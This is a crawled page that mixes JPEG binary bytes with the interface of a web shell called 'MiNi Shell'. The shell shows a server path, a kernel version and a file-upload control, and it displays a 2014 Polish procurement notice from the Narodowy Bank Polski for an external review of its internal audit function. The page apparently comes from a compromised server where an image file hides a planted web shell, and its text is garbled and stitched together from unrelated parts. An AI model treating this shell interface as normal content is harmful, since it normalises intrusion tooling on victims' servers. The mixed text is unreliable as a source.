JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140224/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140224/63736-N-2014.html

<p class="kh_header"><b>Warszawa: Wykonanie usługi audytorskiej w zakresie przeglądu i oceny jakości funkcji audytu wewnętrznego w Narodowym Banku Polskim</b><br>
<b>Numer ogłoszenia: 63736 - 2014; data zamieszczenia: 24.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Narodowy Bank Polski - Departament Zamówień Publicznych , ul. Świętokrzyska 11/21, 00-919 Warszawa, woj. mazowieckie, tel. 22 653 28 20, faks 22 653 25 40.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nbp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usługi audytorskiej w zakresie przeglądu i oceny jakości funkcji audytu wewnętrznego w Narodowym Banku Polskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi audytorskiej w zakresie przeglądu i oceny jakości funkcji audytu wewnętrznego w Narodowym Banku Polskim /dalej NBP/. USŁUGA AUDYTORSKA obejmuje: 
I. BADANIE audytorskie, zwane dalej badaniem, polegające na przeprowadzeniu przeglądu działalności i dokonaniu oceny jakości audytu wewnętrznego w NBP, 
II. sporządzenie RAPORTU z badania, zawierającego wyniki badania, w tym dokonane oceny, opinie i rekomendacje. 	
Ad.I -BADANIEM objęte zostaną wszystkie aspekty prac audytowych i doradczych realizowanych przez Departament Audytu Wewnętrznego NBP /dalej DAW/, co ma zapewnić dokonanie wieloaspektowej oceny działalności audytu wewnętrznego w zakresie jego zgodności z zasadami określonymi w Definicji audytu wewnętrznego, Międzynarodowych Standardach Praktyki Zawodowej Audytu Wewnętrznego, Kodeksie Etyki -opracowanych przez Instytut Audytorów Wewnętrznych /The Institute of Internal Auditors -IIA/. Ocena powinna w szczególności zawierać: 
1. ogólną ocenę zgodności audytu wewnętrznego NBP z Definicją Audytu Wewnętrznego IIA, Kodeksem Etyki IIA oraz Międzynarodowymi Standardami Praktyki Zawodowej Audytu Wewnętrznego IIA /w ostatniej wersji/; ocena dokonana będzie stosownie do zasad i zakresu określonych w Podręczniku oceny jakości IIA /Quality Assessment Manual -w aktualnej wersji/, w szczególności w Tool 19 Standards Conformance Evaluation Summary; ocena powinna mieć odniesienie do zgodności działań DAW ze Standardami Atrybutów IIA /standardy 1000, 1100, 1200, 1300/ oraz ze Standardami Działania IIA /standardy 2000, 2100, 2200, 2300, 2400, 2500 i 2600/; 
2.ocenę zgodności działalności audytu wewnętrznego NBP z wewnętrznymi regulacjami NBP w tym zakresie, w szczególności z uchwałą Zarządu w sprawie kontroli wewnętrznej i audytu wewnętrznego w NBP oraz Podręcznikiem audytu wewnętrznego DAW; 
3.ocenę zgodności zrealizowanych przez DAW audytów na podstawie wybranej do zbadania próby z 2013 roku, z zastrzeżeniem punktu 4; 
4.ocenę zgodności zrealizowanych przez DAW audytów zleconych przez Komitet ds. Audytu Wewnętrznego Europejskiego Systemu Banków Centralnych /Internal Auditors Committee -IAC/ z zasadami określonymi w Podręczniku Audytu IAC - na podstawie wybranej do zbadania próby z lat 2012-2013; 
5.ocenę funkcjonowania i efektywności działań audytu wewnętrznego w zakresie: 
5.1. integracji z procesem governance, zarządzaniem ryzykiem i procesami kontroli wewnętrznej, 5.2. przysparzania Zamawiającemu wartości dodanej oraz spełnienia oczekiwań formułowanych wobec audytu wewnętrznego przez kierownictwo Zamawiającego; 
6.ocenę kompetencji i umiejętności audytu wewnętrznego, uwzględniającą: 
6.1. połączenie wiedzy i doświadczenia oraz różnorodność specjalizacji zawodowych  pracowników, w tym koncentrowanie się na usprawnianiu procesów, 
6.2. ocenę narzędzi i metod stosowanych przez audyt wewnętrzny; 
7.ocenę, czy audyt wewnętrzny funkcjonuje na poziomie best practice, łącznie z odniesieniem /porównaniem/ do działalności audytu wewnętrznego w innych organizacjach i instytucjach finansowych, o porównywalnej z Zamawiającym skali działalności;
8.identyfikację ewentualnych możliwości usprawnień działalności audytu wewnętrznego.
Ad.II -RAPORT z przeglądu i oceny funkcji audytu wewnętrznego powinien w szczególności zawierać: 
1.Rozdział określający cel, zakres, datę badania i oceny, numery i tytuły zadań audytowych przyjętych do badania, z wyodrębnieniem audytów zrealizowanych na zlecenie IAC. W rozdziale tym powinny być również omówione wszelkie inne istotne aspekty, jeśli byłoby to zasadne dla zrozumienia podstaw dokonanej oceny, zaplanowania przeprowadzonego badania i zastosowanych metod działania, 
2.Akapit, zawierający ogólną opinię na temat zgodności działalności audytu wewnętrznego w zakresie formy i treści z dokumentami IIA oraz IAC, o których mowa wyżej. W opinii tej należy wyodrębnić i ocenić stwierdzone przypadki ewentualnego braku zgodności lub częściowej zgodności działań audytu wewnętrznego z tymi dokumentami, 
3.Główne ustalenia, zalecenia i rekomendacje, 
4.Wypełniony formularz Tool 19 Standards Conformance Evaluation Summary - Podręcznika oceny jakości IIA, rozszerzony o dodatkową pozycję, zawierającą ogólną opinię dotyczącą zgodności działalności audytu wewnętrznego (w zakresie zadań audytowych wspólnych, koordynowanych przez IAC) z Podręcznikiem Audytu IAC. Formularz Tool 19 może być rozszerzony, jeśli będzie taka potrzeba, o aneks z komentarzami, dotyczącymi poszczególnych aspektów działalności audytu wewnętrznego i przyjętych dla nich ocen GZ/CZ/NZ.   
Raport ma również zawierać podsumowanie obejmujące  elementy wymienione w punktach 1-4.
Zawarte w raporcie oceny zgodności działań DAW z wymienionymi wyżej Standardami IIA, Kodeksem Etyki IIA i Podręcznikiem Audytu IAC zostaną sporządzone w następującym ogólnym układzie: generalnie zgodny GZ/częściowo zgodny CZ/niezgodny NZ -niezależnie od innych opinii, ocen szczegółowych i rekomendacji, wynikających z przeprowadzonego badania.
Raport w wersji wstępnej -podlegający uzgodnieniom z Zamawiającym -zostanie sporządzony przez Wykonawcę w języku polskim, a raport w wersji ostatecznej -w języku polskim oraz w języku angielskim, po dwa egzemplarze w każdej z wymienionych wersji językowych -w formie papierowej (trwale oprawione) oraz elektronicznej -na nośniku CD/DVD.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.21.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium w postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że posiada wiedzę i doświadczenie, polegające na należytym wykonaniu w okresie ostatnich 3 lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy -w tym okresie, co najmniej jednej usługi audytorskiej przeprowadzonej w banku /*, polegającej na badaniu i ocenie jakości audytu wewnętrznego oraz jego zgodności z Międzynarodowymi Standardami Zawodowej Praktyki Audytu Wewnętrznego IIA /**, przy czym: /* przez bank rozumie się osobę prawną, określoną w Ustawie z dnia 29 sierpnia 1997r. (Prawo bankowe) oraz Banki Centralne Europejskiego Systemu Banków Centralnych,
/** wskazane Standardy zostały wydane przez Instytut Audytorów Wewnętrznych (The Insitute of Internal Auditors - IIA)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje zespołem osób zdolnych do wykonania zamówienia, tj:
3.4.1. osobą, która będzie pełniła funkcję Audytora kierującego zespołem audytorów, posiadającą -zdobyte w ciągu ostatnich 3 lat przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu -co najmniej          2-letnie doświadczenie, polegające na kierowaniu komórką audytu wewnętrznego lub działalnością konsultingową na szczeblu menedżerskim w audycie lub w pokrewnej do audytu dziedzinie, a także doświadczenie w wykonywaniu zewnętrznych badań i oceny jakości audytu wewnętrznego, polegające na uczestniczeniu, w wymienionym okresie 3 lat, w co najmniej jednym takim badaniu  przeprowadzonym w banku oraz kwalifikacje do wykonywania zawodu audytora zewnętrznego - potwierdzone certyfikatem Certified Internal Auditor (CIA), 
oraz
3.4.2. co najmniej dwiema innymi osobami, z których każda posiada -zdobyte w okresie ostatnich 3 lat przed dniem składania wniosków o dopuszczenie do udziału  w postępowaniu -co najmniej 2-letnie doświadczenie w zakresie wykonywania audytu wewnętrznego lub w działalności konsultingowej w audycie lub w pokrewnej do audytu dziedzinie oraz kwalifikacje do wykonywania zawodu audytora wewnętrznego - potwierdzone certyfikatem Certified Internal Auditor (CIA), 
oraz
3.4.3. co najmniej jedną osobą (spoza lub spośród osób, spełniających wymagania wymienione w ppkt 3.4.1. i 3.4.2.), która wykonywała zewnętrzne badanie audytorskie, polegające na ocenie jakości audytu wewnętrznego w Banku Centralnym ESBC,
oraz
3.4.4. co najmniej jedną osobą (spoza lub spośród osób, spełniających wymagania wymienione w ppkt 3.4.1. - 3.4.3.), posiadającą kwalifikacje do prowadzenia oceny jakości audytu wewnętrznego -potwierdzone certyfikatem Certification in Control Self-Assessment (CCSA)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p>
<p class="bold">Opis sposobu dokonywania wyboru wykonawców, którzy zostaną zaproszeni do składania ofert, gdy liczba wykonawców spełniających warunki udziału w postępowaniu będzie większa niż określona w ogłoszeniu o zamówieniu</p>
<p>Znaczenie warunków wyboru wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:
1.Jeżeli liczba Wykonawców, którzy złożyli wniosek o dopuszczenie do udziału w postępowaniu i spełniają warunki udziału w postępowaniu nie przekroczy 5, Zamawiający zaprosi do składania ofert wszystkich Wykonawców, którzy spełniają warunki udziału w postępowaniu. 
2.Jeżeli liczba Wykonawców, którzy złożyli wniosek o dopuszczenie do udziału w postępowaniu i spełniają warunki udziału w postępowaniu, będzie większa niż 5, Zamawiający zaprosi do składania ofert 5 Wykonawców, którzy otrzymali najwyższą ocenę spełniania warunków udziału w postępowaniu. W takim przypadku przy wyborze Wykonawców, którzy zostaną zaproszeni do składania ofert, Zamawiający będzie kierował się:
1) LICZBĄ NALEŻYCIE WYKONANYCH USŁUG, spełniających warunki, o których mowa w sekcji III.3.2 Ogłoszenia o zamówieniu, w sposób następujący:
- za każdą wykazaną usługę dodatkową, Wykonawca otrzyma 10 pkt., a w przypadku, gdy będzie to usługa wykonana w Banku Centralnym ESBC - 20 pkt. Punktacji podlegać będą nie więcej niż 3 dodatkowe usługi,
 2) ILOŚCIĄ OSÓB, spełniających warunki, o których mowa w sekcji III.3.4 Ogłoszenia o zamówieniu, w sposób następujący: 
- za każdą wykazaną dodatkową osobę (z wyłączeniem osoby określonej w punkcie 3.4.1.), która spełnia warunek określony w punkcie 3.4.2. tej sekcji, Wykonawca otrzyma 10 pkt. Punktacji podlegać będą nie więcej niż 3 dodatkowo wykazane osoby, -za każdą wykazaną dodatkową osobę, która spełnia warunek określony w punkcie 3.4.3. tej sekcji, Wykonawca otrzyma 10 pkt. Punktacji podlegać będą nie więcej niż 3 dodatkowo wykazane osoby. 3. W przypadku, gdy dwóch lub więcej Wykonawców otrzyma tę samą liczbę punktów, o kolejności decydować będzie liczba wszystkich usług zawartych w Wykazie wykonanych usług, które spełniają warunki określone w sekcji III.3.2 Ogłoszenia o zamówieniu. Wykonawca, który wykonał najwięcej takich usług otrzyma najwyższą lokatę, a Wykonawcy, którzy wykonali mniejszą ilość usług - uzyskają odpowiednio kolejne, niższe lokaty</p>
<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany postanowień umowy oraz warunki tych zmian zostaną określone w projekcie umowy, który będzie stanowił załącznik do SIWZ w drugim etapie postępowania</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.nbp.pl -Formularz wniosku o dopuszczenie do udziału w postępowaniu i wzory załączników<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zostanie przesłana wykonawcom zaproszonym do złożenia oferty.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.03.2014 godzina 11:00, miejsce: Narodowy Bank Polski - Biuro Podawcze, 00-919 Warszawa, ul.Świętokrzyska 11/21.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> A. Informacje ogólne
1. W postępowaniu oświadczenia, wnioski (za wyjątkiem wniosku o dopuszczenie do udziału w postępowaniu), zawiadomienia oraz informacje, Zamawiający i Wykonawcy przekazują w języku polskim, w formie pisemnej, bądź za pomocą faksu lub e-mailem, z zastrzeżeniem postanowień ust. 2 i 3.
2. Dokumenty niezbędne dla wykazania spełniania warunków udziału w postępowaniu i braku podstaw do wykluczenia, o których mowa w sekcji III.4 Ogłoszenia o zamówieniu, składane przez Wykonawcę na skutek wezwania Zamawiającego, na podstawie art. 26 ust. 3 Ustawy, zostaną złożone w formie pisemnej. Zamawiający uzna te dokumenty i oświadczenia za złożone                  w wyznaczonym terminie, jeżeli ich treść w formie pisemnej dotrze do Zamawiającego przed upływem wyznaczonego terminu.
3. Zamawiający żąda, aby wniosek o dopuszczenie do udziału w postępowaniu, zwany dalej Wnioskiem został złożony w formie pisemnej.
4. Informacja o złożeniu Wniosku może być przekazana telefonicznie przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu. Wniosek uważa się za złożony w terminie, jeżeli przed upływem terminu składania Wniosków został wysłany w formie pisemnej i Zamawiający otrzymał go nie później niż w terminie 7 dni od dnia upływu terminu składania wniosków.
5. Zamawiający na swojej stronie internetowej www.nbp.pl. opublikował niniejsze Ogłoszenie o zamówieniu oraz formularz Wniosku wraz z wzorami załączników.
6. Zamawiający udostępni Wykonawcy formularz Wniosku i wzory załączników w wersji edytowalnej, po otrzymaniu wniosku (prośby) przesłanego elektronicznie na adres: elzbieta.pieniazek@nbp.pl lub faksem na numer określony w sekcji I.1).  
B. Opis sposobu przygotowania Wniosku
1. Wniosek o dopuszczenie do udziału w postępowaniu zostanie sporządzony w języku polskim, zgodnie z treścią formularza udostępnionego na stronie internetowej Zamawiającego.
2. Wraz z Wnioskiem Wykonawca złoży dokument rejestrowy i sporządzone w języku polskim:
2.1 oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych,
2.2 oświadczenia i dokumenty, wymienione w sekcji III.4 Ogłoszenia o zamówieniu,
2.3 pełnomocnictwo do podpisywania Wniosku i jego załączników, o ile prawo do podpisywania Wniosku nie wynika z innych dokumentów złożonych wraz z Wnioskiem. Pełnomocnictwo do podpisania Wniosku zostanie złożone w oryginale lub w kopii potwierdzonej notarialnie lub przez osobę udzielającą pełnomocnictwa.
2.4 pełnomocnictwo, ustanawiające pełnomocnika do reprezentowania Wykonawcy  w postępowaniu albo reprezentowania Wykonawcy w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego - dotyczy wykonawców wspólnie ubiegających się o udzielenie zamówienia.
3. Zamawiający wymaga aby Wykonawca złożył w formie oryginału formularz Wniosku i oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art.22 ust.1.	
4. Pozostałe oświadczenia i dokumenty wymienione w Ogłoszeniu można złożyć w formie oryginału lub kopii. Kopie mają być poświadczone za zgodność z oryginałem przez osobę/y/ upoważnione do reprezentowania wykonawcy, z wyłączeniem postanowień dotyczących poświadczania za zgodność z oryginałem kopii pełnomocnictw. 
W przypadku wykonawców wspólne ubiegających się o zamówienie oraz w przypadku innych podmiotów, na zasobach których polega wykonawca na zasadach określonych w art.26 ust.2b ustawy, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są  poświadczane za zgodność z oryginałem odpowiednio przez osoby upoważnione do reprezentacji wykonawcy lub osoby upoważnione do reprezentacji tych podmiotów. Poświadczenie za zgodność z oryginałem należy sporządzić w sposób umożliwiający identyfikację podpisu        (np. podpis wraz pieczątką imienną lub czytelnie imię i nazwisko).
5. Wszystkie dokumenty i oświadczenia sporządzone w języku obcym należy złożyć wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę. 
6. Dopuszcza się używanie we wniosku o dopuszczenie do udziału w postępowaniu, oświadczeniach  oraz innych dokumentach, określeń obcojęzycznych w zakresie określonym w art. 11 ustawy z dnia 7.10.1999 r. o języku polskim (Dz. U. z 1999 r. Nr 90, poz. 999, z późn. zm.) oraz nazw własnych w języku angielskim.
7. Wszelkie poprawki lub zmiany w tekście Wniosku mają być parafowane własnoręcznie przez osobę/y podpisujące wniosek. 
8. Wniosek wraz z jego załącznikami - oświadczeniami i dokumentami wymienionymi w sekcji III.4 Ogłoszenia o zamówieniu, jak również pełnomocnictwem, należy złożyć w miejscu: Narodowy Bank Polski, 00-919 Warszawa, ul. Świętokrzyska 11/21, bezpośrednio w Biurze Podawczym Kancelarii NBP (wejście do obiektu od strony ul. Świętokrzyskiej). Czas urzędowania Biura Podawczego Kancelarii NBP: w dni robocze od poniedziałku do piątku, w godzinach: 8:00-16:00. 
Dokumenty należy złożyć w zamkniętym opakowaniu (kopercie), w sposób zabezpieczający nienaruszalność do terminu otwarcia ofert. Koperta (opakowanie) zawierające wniosek ma posiadać następujące oznaczenie:
Wniosek o dopuszczenie do udziału w postępowaniu pn. usługa audytorska -  numer sprawy DZP-WPP-EP-243-002/DAW/14.
Na kopercie opakowaniu należy podać: nazwę i adres siedziby Wykonawcy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com